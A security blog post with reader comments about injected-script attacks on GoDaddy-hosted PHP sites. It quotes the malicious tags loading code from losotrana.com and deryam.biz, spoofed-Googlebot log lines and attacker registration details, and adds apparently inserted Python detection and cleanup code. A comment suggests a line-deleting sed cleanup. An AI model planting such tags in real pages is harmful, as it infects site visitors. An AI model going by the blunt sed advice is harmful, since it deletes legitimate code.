Continuing attacks at GoDaddy – Losotrana.com

And it is still not over. Remember the code we found last week that was hacking all the PHP files at GoDaddy?

It is still happening, but now using the losotrana.com domain ( http://losotrana.com/js.php ). This is the script that will show up on your site if you get hacked:

<script src="http://losotrana.com/js.php"></script>

Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:

http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

You can clean up using this script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
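As an added example (not the Sucuri cleanup script linked above), the following Python scan locates PHP files that carry the injected losotrana.com script tag and removes only that tag, writing a .bak copy before touching anything. Function names and the backup convention are this example's own assumptions.

```python
import re
from pathlib import Path

# The injected tag reported in the post; the pattern tolerates quote and
# spacing variants but matches nothing else in the file.
INJECTED_TAG_RE = re.compile(
    r'<script\s+src=["\']?https?://losotrana\.com/js\.php["\']?\s*>\s*</script>',
    re.IGNORECASE,
)


def find_injections(text):
    """Return every injected tag found in a file's contents."""
    return [m.group(0) for m in INJECTED_TAG_RE.finditer(text)]


def clean_text(text):
    """Strip only the injected tag; return (cleaned_text, removed_count)."""
    return INJECTED_TAG_RE.subn("", text)


def scan_tree(root, clean=False):
    """Walk `root` for *.php files and report (path, count) per infected file.

    With clean=True, keep a <name>.bak copy, then rewrite the file without
    the tag. surrogateescape keeps non-UTF-8 bytes intact on the round trip.
    """
    results = []
    for path in Path(root).rglob("*.php"):
        original = path.read_text(encoding="utf-8", errors="surrogateescape")
        cleaned, count = clean_text(original)
        if count == 0:
            continue
        results.append((str(path), count))
        if clean:
            backup = path.with_name(path.name + ".bak")
            backup.write_text(original, encoding="utf-8", errors="surrogateescape")
            path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return results


if __name__ == "__main__":
    # Report-only run over the current directory; pass clean=True to remove.
    for infected, n in scan_tree(".", clean=False):
        print(f"{infected}: {n} injected tag(s)")
```

Run it report-only first and review the list; a line-deleting cleanup such as `sed '/base64_decode/d'` removes legitimate code as well, whereas this only removes the exact tag.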

All the sites affected so far are hosted at GoDaddy. If you are signed up with us, our system should have already alerted you (or it will do so very soon). Again, this is not YOUR fault! GoDaddy admitted they have a problem, but it looks like they have not been able to fix it yet.

A curiosity is that Losotrana.com is hosted at the same IP address as holasionweb.com, the domain used in the previous attack:

$ host holasionweb.com
holasionweb.com has address 188.165.200.96
$ host Losotrana.com
Losotrana.com has address 188.165.200.96

Also, all the domains used in the latest attacks were registered by the same person:

Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The requests to infect all the files are coming from 178.32.42.1, which is also spoofing Google's crawler (Googlebot) user agent, as the log line shows:

178.32.42.1 - - - "GET www.x.com/simple_production.php HTTP/1.1" 200 57 "-" 
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
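A Googlebot user agent is cheap to fake; Google's published test for a genuine crawler is a reverse DNS lookup of the client IP that lands under googlebot.com or google.com and forward-resolves back to the same IP. The detector below (an added example, not Sucuri's tooling) parses combined-format access log lines and flags Googlebot claims that fail that test; the sample log lines, the documentation addresses 192.0.2.10 and 203.0.113.5, and the offline resolver are constructed for the example.

```python
import re
import socket

# Combined-format access log line; the lazy ".*?" skips whatever sits between
# the client IP and the request (the post's own line carries no timestamp).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the parsed fields as a dict, or None for a non-matching line."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def dns_resolver(ip):
    """Live lookup: PTR name for ip, kept only if it resolves back to ip."""
    try:
        name = socket.gethostbyaddr(ip)[0]
        if ip in {entry[4][0] for entry in socket.getaddrinfo(name, None)}:
            return name
    except OSError:  # covers socket.herror and socket.gaierror
        pass
    return None


def is_verified_googlebot(ip, resolve=dns_resolver):
    """Forward-confirmed reverse DNS under googlebot.com or google.com."""
    name = resolve(ip)
    return bool(name) and name.lower().endswith((".googlebot.com", ".google.com"))


def find_spoofed_googlebot(lines, resolve=dns_resolver):
    """(ip, path) for each request claiming Googlebot that fails the DNS test."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and "Googlebot" in rec["ua"] and not is_verified_googlebot(rec["ip"], resolve):
            hits.append((rec["ip"], rec["path"]))
    return hits


# Constructed sample log: 178.32.42.1 and its path are the post's values.
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
SAMPLE_LOG = [
    f'178.32.42.1 - - [20/May/2010:10:00:00 +0000] "GET www.x.com/simple_production.php HTTP/1.1" 200 57 "-" "{GOOGLEBOT_UA}"',
    f'192.0.2.10 - - [20/May/2010:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 1532 "-" "{GOOGLEBOT_UA}"',
    '203.0.113.5 - - [20/May/2010:10:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 480 "-" "Mozilla/5.0 (Windows NT 6.1)"',
]
# Constructed offline stand-in for DNS: only 192.0.2.10 gets a googlebot.com PTR.
FAKE_PTR = {"192.0.2.10": "crawl-192-0-2-10.googlebot.com"}


def offline_resolver(ip):
    return FAKE_PTR.get(ip)
```

Against a real log, pass the default `dns_resolver` and treat each hit as a request to inspect, since the fetched path is the dropped file the attacker triggered.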

Update: GoDaddy FTP server seems to be down.

As always, if you are having difficulties getting your site cleaned up, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • http://www.blogger.com/profile/08850640338059899859 ReadJunk

    I'm seriously done with Go Daddy. e-mail me at bryan@readjunk.com if you have any good suggestions for a hosting company! thanks!

  • snxuev

    it seems to request ->
    www3.burhot33-td[dot]net ->
    http://www.welcomewavedotnet/vidpage.php |Tsunamee[dot]net – A Web Media Experience | -> /'
    http://www.youtubedotcom/watch?v=maCSZFEPwzc ->
    http://www.defendthehousedotcom/
    maybe I'm wrong?
    remove this comment if I'm wrong

  • http://bourgy.com Bourgy

    I am done too. The code hit me 3 hours ago. Unfortunately I didn't use the sucuri script because I heard of the space error.

    I used another script I saw here but that needs you to click OK. There is no telling how many people's computers I may have infected. This thing is costing me thousands of visitors

  • http://www.kindredscents.com soy candles

    Just got off the phone with Go Daddy and they are so flippant about it. They knew it was going on and waited until I said something to them before they ran some script that totally blew away my footer. So be careful when they run the script.

    Fact is this happened to me twice and they could have told me the last time that it was an issue and I wouldn't be spending my morning fixing this.

  • http://www.blogtips.org Peter

    hilarykneber@yahoo.com hey? Google it… This is a name which got famous in the hackers world a while ago…

    PS: in your script, you might put a
    set_time_limit(0); ?

    would that not solve scripts being cleaned up, but left with a blank line?

    Peter

  • http://www.blogger.com/profile/17504080918546577656 the insider

    1st it was a base64 encoded code inserted on the top of every page… now it is this stupid losotrana thing… And godaddy refuses to help…
    anybody found a cure to this ??!!!

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Peter: Good idea, fixed the script.

  • http://www.blogger.com/profile/03888150968785200559 The Lonely Conservative

    This time I used your sucuri clean up script and it seems to have worked. This is getting so annoying. I lose readers every time.

  • Anonymous

    Godaddy answer to my new ticket:

    "Thank you for contacting the Hosting Security Team.

    A number of websites running PHP applications, such as WordPress and Joomla, have been affected by malware. These attacks have affected many hosting providers, including Go Daddy. They are a serious threat and we're committed to eliminating them.

    While transparency is something we value, when Internet users release information about the attacks, such as the code used to create them, it really only helps the hackers. As they gain clues into our investigation, it gives the attackers more power.

    The origin and characteristics of these attacks continue to change from day to day. Thanks to the efforts of our team, we've kept the number of affected sites to a minimum (fewer than a tenth of 1 percent of the sites we host). This means we can devote a lot of attention to the compromised websites.

    Your protection is our top priority. Our team of security experts is working around the clock to monitor our systems, investigate incidents and implement counter-measures to neutralize potential threats. You can find information about who is affected, what the attack is, and ways you can fix the problem here: http://community.godaddy.com/godaddy/whats-up-with-go-daddy-wordpress-php-exploits-and-malware/

    Go Daddy appreciates your concern on this critical issue. We're here to help, and are making every effort to answer your questions and concerns.

    Our goal is to help you keep your website safe and secure."

  • Anonymous

    Sucuri script still works perfectly, my site was infected and I have already cured it with this script.
    Thank you very much.

  • Anonymous

    http://www.x.com is paypal affiliate?

  • http://www.blogger.com/profile/13437851692972821584 AW

    Something has come back into my sites. As of a few hours ago. Yet, so far I've been able to run your script again. The malware didn't seem to run – so far.

  • http://www.blogger.com/profile/13437851692972821584 AW

    This went into my php files as of 18:33 (Japan time)

  • Anonymous

    anybody found a cure to this ??!!!

    Yes, toss our computers and modems and boxes and gadgets onto the curb for trash pickup and do something sane.

    This will instantly neutralize the hacker armies in one easy step and they'll have to find something else to do. Like hacking themselves.

  • Techlands

    If you have SSH access to your godaddy account, running this from your html directory will strip out the infection:

    find . -type f -name "*.php" -exec sed -i '/base64_decode/d' {} \;

  • Anonymous

    "if you have SSH access to your godaddy account running this from your html directory will strip out the infection"

    How are we to know you're not a hacker?

  • Ipstenu

    Re the SSH suggestion it looks fine to me, but if you're being overly cautious (which I applaud), see http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

  • Anonymous

    Does anyone have:

    Hosting Configuration: 2.2
    PHP Version: PHP 5.x

    hacked?

    I have 2 host and the only one being hacked is the older:

    Hosting Configuration: 2.0
    PHP Version: PHP 4.x

    Can you cross-check info?

  • http://bourgy.com Bourgy.com

    Hosting Configuration: 2.0
    PHP Version: PHP 5.x

  • http://bourgy.com Bourgy

    Does it even make sense changing ftp and DB passwords this time?
    I just left it as is. I am tired

  • http://sincemydivorce.com Mandy

    I'm done with GoDaddy too – this is the fourth attack in less than three weeks. So done and so thankful for Sucuri.

    Moving to BlueHost today.

  • http://www.blogtips.org Peter

    I adapted one of the existing scripts into a PHP script that first lists the infected files, asks for confirmation to cure, and then lists the cured files…

    Slightly more user-friendly…:

    See this post: http://bit.ly/c2yGCP

    Peter

  • Anonymous

    I'm holding on to something I said earlier.
    They only have one FTP user with high privileges on the network and one php file is responsible for infecting the entire full FTP.
    Or a disgruntled employee, or competition from Godaddy support contract someone to do this.

  • http://www.blogtips.org p

    @anonymous,

    But even then, hosting companies should have those security measures in place to detect that loophole, and close it. It should not take 4 hacking series… and still no action.

    Peter

  • John

    I have a few Go Daddy hosting accounts and some were hacked and some weren't.

    I've also cross-referenced a few friends who are on Go Daddy and all of us except for 1 have a folder in the root directory called php_uploads.

    I wonder if there's a connection?

    Anyone else who was hacked have that?

    Strangely, the sites I have on GD which weren't hacked did not have that directory.

  • http://www.thehosthelpers.com rvtraveller

    For all those interested, I am fairly certain this is an issue with phpMyAdmin (which GoDaddy uses for database management).

    Hosting info:
    Go Daddy (2.1 configuration)
    PHP 5.x

    I was affected by the previous 2 attacks holasionweb and indesignstudio garbage. Both times I had the most recent version of phpMyAdmin on my account to manage databases without having to log in to my hosting control panel. During the first attack (prior to indesignstudio I believe), my phpMyAdmin copy was protected via htaccess/htpasswd. I removed this because of other work I was doing and the password requirement was getting in the way of something else I wanted to run in that same directory. During this time I had all my PHP files hacked twice inserting the base64 code at the top. After the second attack (to me), I re-password protected my phpMyAdmin directory AND I was not affected by this attack.

    I realize this isn't conclusive evidence of a particular vulnerability in phpMyAdmin, but in my experience, when phpMyAdmin wasn't password protected, I got hacked and when it was protected I did not.

  • http://bourgy.com Bourgy

    I have the php upload folder, I assume it's there for a reason.

    And rvtraveller, how do I password protect that?

  • http://www.blogger.com/profile/16694816955747818794 Pemo Theodore

    I moved my blog last week from godaddy to the best hosting company. Great deals & incredible customer service. Check out my post http://www.ezebis.com/technology/hosting/

  • Anonymous

    After 2 hacks on Godaddy, I moved my site to Google App Engine which doesn't even run PHP (I had been planning to do this for months). Interestingly enough my logs show a request for —–_—–.php (I blanked out the letters), early on May 17, an obvious attempt at running the Godaddy hack. Of course they just got a 404 error this time! Bastards

  • Anonymous

    Found this thread and thank goodness. I was getting all paranoid about my local firewall and data having been compromised. Yep, happened to me too. I'm not sure how many hundreds of customers were hit with a malware attack from the script linking to www3.burhot33-td[dot]net ->

    Dam it GoDaddy!

  • http://bourgy.com Bourgy

    I had the burhot33 redirect too

  • Anonymous

    At godaddy.com – change permissions – to read only!!! No write & execute. And you are free to go – no viruses.

  • Anonymous

    But if the attacker can impersonate you, he could change the permissions & do what he wants.

  • http://www.davidecanali.com dcanali

    So,
    this is the 3rd time I get infected.
    The second time they actually managed to inject the malicious payload in my pages, and I saw this request:

    178.32.124.20 – – [12/May/2010:00:45:54 -0700] "GET http://www.newdigest.com/function_boone.php HTTP/1.1" 200 113 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    The first and second time I was infected they were not so fast to call the script – I disabled it before their request.
    I've set up a cron job that monitors the hosting root directory for any file creation, and sends me information about it. Yesterday another file was created on my account, with my uid and gid (protection mask 420 – all my files and folders have 705 or 644).
    At that time only 1 user was logged in using ssh, and there were a bunch of active or idle FTP sessions on the server (normal users apparently).
    Nothing suspicious, apparently, even from the list of running processes.

  • Anonymous

    The problem in Godaddy continues…

    My WordPress file monitor detected another file put in my host by the hacker:

    This email is to alert you of the following changes to the file system of your website
    Timestamp: Thu, 20 May 2010 16:12:33 +0200

    Added:
    guilbert_being.php

    I deleted and all my files are ok…

  • Anonymous

    Hi,

    I am seriously worried about the long attack time (more than one week of work for hosting support teams…).

    I am a system administrator from Spain and none of our customers are affected this time, but it is a problem too…

    I want to offer all people that are investigating possible security holes an idea that I don't read in the blog or comments… Some months ago we detected some apache (and php?) threads and children that were kidnapped from another child. What does this mean? Someone on a neighbouring domain (on the same machine) can kidnap an apache thread (and children) of another user and, if it is combined with the apache privileges, can put a file in another domain or can redirect users to another page…

    Take care about all running apache processes ;)

    This bug must be fixed but maybe it was not solved correctly.

    Good luck with your sites and remember that security of your sites begin in You :-)

  • Anonymous

    The latest GoDaddy nonsense:
    "While transparency is something we value, when Internet users release information about the attacks, such as the code used to create them, it really only helps the hackers. As they gain clues into our investigation, it gives the attackers more power."

    This is *such* BS. The hackers know EXACTLY what they're doing, they're not going to learn anything from sites like this one, the godsend Sucuri Security… It's the REST of us, the site owners and webmasters, who are the ones who need to know!

    WHY can't you solve this GoDaddy, and WHY have you tried to keep everything a secret while blaming US?

    After four years, I am DONE with GoDaddy. You failed YET AGAIN to protect my site/business this week, for the fourth time in two months, and that is one strike too many… Say goodbye to me and thousands of others, I am sure.

  • Anonymous

    Why does it not make sense that PHP is a bloated hunk of junk and PHP could be the reason that hackers are getting in? It's happening with more hosts than GoDaddy and other scripts other than WP. To me as a programmer I would be looking at PHP and where you are getting it from; better yet move to .ASP or .NET, attacked more, but hacked less, and less is better for me.

  • http://bitsa.me greg

    I think you have it right looking seriously at PHP.
    My GoDaddy site was hit 3 times, first was an unrelated PHP contact form (not in the root folder), then a WordPress site that just melted and finally a Modx rebuild of my blog was hit while I was online in the manager interface.
    All in 3 days, any static HTML was untouched, I am not a PHP programmer but a language that is loosely typed, uses global variables and regular expressions that are impossible for a human to read has got to have a lot of soft entry points, especially on a shared server.
    Apart from looking for a dedicated virtual server, I have pulled out the Java and Ruby tutorials for a refresher.
    It's much harder having to code without simple frameworks and more expensive delivering the end result, but I for one have decided PHP on shared hosting is only for sites that are no big deal if I lose them.
    Any small client sites I leave PHP out of the mix if I can.

  • Anonymous

    Let me know when WordPress releases a version without PHP.

  • Anonymous

    One of my websites has been attacked. The following line was added to my site:
    script src=http://deryam.biz/wapchat/photos/umumi.php
    The website is hosted at GoDaddy IIS. I think it is the same problem, isn't it?

  • Howard

    My GoAwayDaddy account has been compromised and GoDaddy is not being helpful at all.
    Stay away from GoDaddy!!

  • Pingback: Yet another series of attacks – This time using whereisdudescars.com | Sucuri